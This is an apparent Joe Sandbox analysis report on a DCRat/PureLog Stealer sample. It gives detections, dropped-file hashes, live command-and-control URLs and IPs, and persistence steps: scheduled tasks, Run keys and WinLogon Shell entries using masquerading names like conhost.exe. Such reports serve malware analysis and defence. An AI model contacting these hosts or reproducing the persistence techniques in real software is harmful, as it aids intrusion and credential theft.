                            C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\OuwhFfWF.log100%Joe Sandbox ML
                            C:\Program Files\Windows Defender\en-GB\conhost.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files\Windows Defender\en-GB\conhost.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Recovery\VTixufCejPQZEvXiB.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\Public\AccountPictures\winlogon.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\JzShoUtR.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\OuwhFfWF.log8%ReversingLabs
                            C:\Users\user\Desktop\YdQxpHbm.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\exZDPEZZ.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\hEXMkWTV.log8%ReversingLabs
                            C:\Users\user\Desktop\hMjNZkhU.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\nocldQFM.log25%ReversingLabs
                            C:\Users\user\Desktop\xWYkXXxo.log25%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            306039cm.nyashcrack.top
                            		37.44.238.250
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.phptrue
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drfalse
                                		high
                                https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000037.00000003.2168596932.0000029C9D51A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtab6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drfalse
                                      		high
                                      https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drfalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001A.00000002.1893613908.00000218E546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240916D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B2069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001A.00000002.1893613908.00000218E546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240916D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B2069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 0000001C.00000002.3275003437.00000280ACA4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3292176472.00000240A152A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drfalse
                                                          		high
                                                          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000037.00000003.2168596932.0000029C9D4A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D507000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D4F4000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drfalse
                                                              		high
                                                              https://aka.ms/pscore68powershell.exe, 0000001A.00000002.1893613908.00000218E5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240914B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B1E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B912B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003547000.00000004.00000800.00020000.00000000.sdmp, 4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1893613908.00000218E5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240914B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B1E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B912B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=6bRjdXvoM1.54.dr, q99Xyv2u0S.54.drfalse
                                                                      		high
                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.drfalse
                                                                        		high
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          37.44.238.250
                                                                          		306039cm.nyashcrack.topFrance
                                                                          		49434HARMONYHOSTING-ASFRtrue

                                                                          Private

                                                                          IP
                                                                          127.0.0.1

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1571653
                                                                          Start date and time:2024-12-09 15:58:53 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 9m 42s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:56
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:4si9noTBNw.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:68ef473852d3aefd8e5e4f2e00b3dfaa.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.spre.troj.spyw.expl.evad.winEXE@48/77@1/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 60%
                                                                          HCA Information:Failed
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, schtasks.exe
                                                                          • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 13.107.246.63
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target conhost.exe, PID 8420 because it is empty
                                                                          • Execution Graph export aborted for target winlogon.exe, PID 8616 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: 4si9noTBNw.exe

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          09:59:53API Interceptor170x Sleep call for process: powershell.exe modified
                                                                          10:00:32API Interceptor821363x Sleep call for process: 4si9noTBNw.exe modified
                                                                          10:00:33API Interceptor2x Sleep call for process: svchost.exe modified
                                                                          14:59:48Task SchedulerRun new task: VTixufCejPQZEvXiB path: "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
                                                                          14:59:48Task SchedulerRun new task: VTixufCejPQZEvXiBV path: "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
                                                                          14:59:50Task SchedulerRun new task: winlogon path: "C:\Users\Public\AccountPictures\winlogon.exe"
                                                                          14:59:50Task SchedulerRun new task: winlogonw path: "C:\Users\Public\AccountPictures\winlogon.exe"
                                                                          14:59:53Task SchedulerRun new task: 4si9noTBNw path: "C:\Users\user\Desktop\4si9noTBNw.exe"
                                                                          14:59:53Task SchedulerRun new task: 4si9noTBNw4 path: "C:\Users\user\Desktop\4si9noTBNw.exe"
                                                                          14:59:53Task SchedulerRun new task: conhost path: "C:\Program Files\Windows Defender\en-GB\conhost.exe"
                                                                          14:59:53Task SchedulerRun new task: conhostc path: "C:\Program Files\Windows Defender\en-GB\conhost.exe"
                                                                          14:59:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiB "C:\Recovery\VTixufCejPQZEvXiB.exe"
                                                                          15:00:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\Public\AccountPictures\winlogon.exe"
                                                                          15:00:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files\Windows Defender\en-GB\conhost.exe"
                                                                          15:00:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4si9noTBNw "C:\Users\user\Desktop\4si9noTBNw.exe"
                                                                          15:00:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiB "C:\Recovery\VTixufCejPQZEvXiB.exe"
                                                                          15:00:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\Public\AccountPictures\winlogon.exe"
                                                                          15:00:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files\Windows Defender\en-GB\conhost.exe"
                                                                          15:00:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4si9noTBNw "C:\Users\user\Desktop\4si9noTBNw.exe"
                                                                          15:01:03AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiB "C:\Recovery\VTixufCejPQZEvXiB.exe"
                                                                          15:01:12AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\Public\AccountPictures\winlogon.exe"
                                                                          15:01:21AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files\Windows Defender\en-GB\conhost.exe"
                                                                          15:01:30AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 4si9noTBNw "C:\Users\user\Desktop\4si9noTBNw.exe"
                                                                          15:01:47AutostartRun: WinLogon Shell "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
                                                                          15:01:56AutostartRun: WinLogon Shell "C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe"
                                                                          15:02:04AutostartRun: WinLogon Shell "C:\Recovery\VTixufCejPQZEvXiB.exe"
                                                                          15:02:13AutostartRun: WinLogon Shell "C:\Users\Public\AccountPictures\winlogon.exe"
                                                                          15:02:22AutostartRun: WinLogon Shell "C:\Program Files\Windows Defender\en-GB\conhost.exe"

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          37.44.238.250Qsi7IgkrWa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
                                                                          4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 143840cm.nyashteam.ru/DefaultPublic.php
                                                                          s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
                                                                          QMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                                                          • 117813cm.n9shteam.in/ExternalRequest.php
                                                                          EQdhBjQw4G.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                                                          3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                                                          HcEvQKWAu2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
                                                                          k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                                          • 452132cm.n9shteam2.top/Processdownloads.php
                                                                          FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
                                                                          cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php

                                                                          Domains

                                                                          No context

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          HARMONYHOSTING-ASFRQsi7IgkrWa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 37.44.238.250
                                                                          4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 37.44.238.250
                                                                          http://clavity.meGet hashmaliciousUnknownBrowse
                                                                          • 185.157.247.125
                                                                          s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 37.44.238.250
                                                                          QMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                                                          • 37.44.238.250
                                                                          EQdhBjQw4G.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 37.44.238.250
                                                                          3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 37.44.238.250
                                                                          HcEvQKWAu2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 37.44.238.250
                                                                          k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                                          • 37.44.238.250
                                                                          FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 37.44.238.250

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Users\user\Desktop\JzShoUtR.logeu6OEBpBCI.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            IYXE4Uz61k.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                              file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                FToZAUe1tw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  gorkmTnChA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    fnNUIS1KeW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      kqq1aAcVUQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        Qsi7IgkrWa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          A5EbyKyjhV.exeGet hashmaliciousDCRatBrowse
                                                                                            file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                              Created / dropped Files

                                                                                              C:\Program Files (x86)\AutoIt3\495e0f92d6994d

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):211
                                                                                              Entropy (8bit):5.800440794040198
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:tqTdNbm39tL+LyaWsQYRzVQc1AHAd3EfqH++GF+IdMuoZHXcWRljDOOtYGiJIPRm:tqPA9tatKg1EiH+Z+IdIsYBDTqGi2PA
                                                                                              MD5:B39A1CDCC601435175F90D068ABE8F74
                                                                                              SHA1:F90E89E7CE69514A04B186C17CB4D37599D8186F
                                                                                              SHA-256:84499A8ADCF135134601034D63E049A04190E6E5E164801DCB5C0908B715920D
                                                                                              SHA-512:6D46EB8B24DC27716177E6594BEDA3E85D22FF71C7E9A2D8A787E235F31E1526DF1EBE70277CFAD3E8566687C62F857A76EB7ABB634756092C4D44C4FF2F212C
                                                                                              Malicious:false
                                                                                              Preview:KEP1eq4s1HBSluHZVXXlcC8DaBRzUmXXxrZZbnajlbndDxUqllNBrauIFMadYFYOuof4Vr7s6y9AYeAnqlNsZVpW6RUPM7KgCYsYRaU4ofF3bttkLxww1qzZ8J8EXrf8nc89wlVQRTD3Qw4MhtEZLYpWiTaIbQg69GP8vtykbffim6JLOvgonGxPxmacLNyAwG4Jh5by4d7p2HtmKO4

                                                                                              C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1920000
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              MD5:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              SHA1:3BA2594EC459D1C9152558EBDD9611427347A73E
                                                                                              SHA-256:F28D2482802E94CD02376A7153B318EF4FACC86CFC804AE117419C520520F8EC
                                                                                              SHA-512:8602717380A4AD4CA7CBCDBB2373E63FF8578D58E6324D43530B134C6D7005469FF89C45BAD773DA978D4263A56C51EFD331B09790F5708A563F26A513CAD3FF
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@..................................b..K....... ............................................................................ ............... ..H............text...$C... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................c......H...........0...........4....z..Eb.......................................0..........(.... ........8........E....*...9...).......8%...(.... ....~....{u...9....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E............o...F...........8........~....(l...~....(p... ....?.... ....~....{....9....& ....8....~....9C... ....~....{....:....& ....8t...8t... ....~....{....:[...& ....8P......... ....8@...~....(d... .... .... ....s....~...

                                                                                              C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              C:\Program Files (x86)\Java\495e0f92d6994d

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):160
                                                                                              Entropy (8bit):5.621138079844866
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Wq/jXdHWz2iByh/w8m4UHUSGDqJyOnBxxcpOjJzlWlhXLHfpJsllGM54xLwn:ttg2iB67m4mLpHKpO7WlhXrEZ54xUn
                                                                                              MD5:7D73D5FAB40D173CE878A5FE434B91F1
                                                                                              SHA1:3C43CCF319FC021A2D7F679A51B5040D5B7ED846
                                                                                              SHA-256:4486E4C51AA422E56A0D36E366C7A169AD294FE483C5FDB628E175675FFB3850
                                                                                              SHA-512:F5B3A194F33A65AD235688447C6F3FF2D6ADC28D28CF39D505220C4503DC48BC1A825183B7191C1CE4E4EFD92312E158AF309C764128036F896CDDD7D17FAC9D
                                                                                              Malicious:false
                                                                                              Preview:SWYOqfvgB9oSUsuJJHWq3yS6SIP4xB0gtRfiFs9WVNlKjlVCHJtLnfQeDb5hP0sAJIiCMLEaI9UqMHWqwNwoRo2OBAenwbHeekBbDTz6FTDoLkR6FPuCEEsePUAMrbnr2zLlF5ndX0j8lODbthihqEaa2hMsSnOn

                                                                                              C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1920000
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              MD5:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              SHA1:3BA2594EC459D1C9152558EBDD9611427347A73E
                                                                                              SHA-256:F28D2482802E94CD02376A7153B318EF4FACC86CFC804AE117419C520520F8EC
                                                                                              SHA-512:8602717380A4AD4CA7CBCDBB2373E63FF8578D58E6324D43530B134C6D7005469FF89C45BAD773DA978D4263A56C51EFD331B09790F5708A563F26A513CAD3FF
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@..................................b..K....... ............................................................................ ............... ..H............text...$C... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................c......H...........0...........4....z..Eb.......................................0..........(.... ........8........E....*...9...).......8%...(.... ....~....{u...9....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E............o...F...........8........~....(l...~....(p... ....?.... ....~....{....9....& ....8....~....9C... ....~....{....:....& ....8t...8t... ....~....{....:[...& ....8P......... ....8@...~....(d... .... .... ....s....~...

                                                                                              C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              C:\Program Files\Windows Defender\en-GB\088424020bedd6

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with very long lines (805), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):805
